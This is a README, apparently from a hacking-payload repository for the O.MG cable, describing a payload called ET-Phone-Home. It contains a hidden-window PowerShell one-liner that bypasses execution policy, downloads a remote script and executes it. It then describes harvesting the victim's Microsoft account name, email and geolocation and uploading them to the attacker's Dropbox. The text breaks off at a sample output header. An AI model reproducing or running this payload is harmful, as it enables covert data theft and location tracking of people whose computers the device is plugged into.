I-Am-Jakoby/hak5-submissions/OMG/Payloads/OMG-ET-Phone-Home/README.md

 ```
 powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
 ```
-* The OMG device will attempt to detect the Wifi Access point you designated, if it does not..
-* A one liner in the run box will download and execute the ET-Phone-Home Script
-* This script will get the Name and Email associated with the microsoft account of the persons computer your device connected to
-* The latitude and longitude of where the device was when it was activated will also be collected
-* This gathered information will be saved to a text file in the TMP Directory
-* That file will be uploaded to your DropBox cloud storage

 Something Like What you see below will be in your cloud storage:

 NAME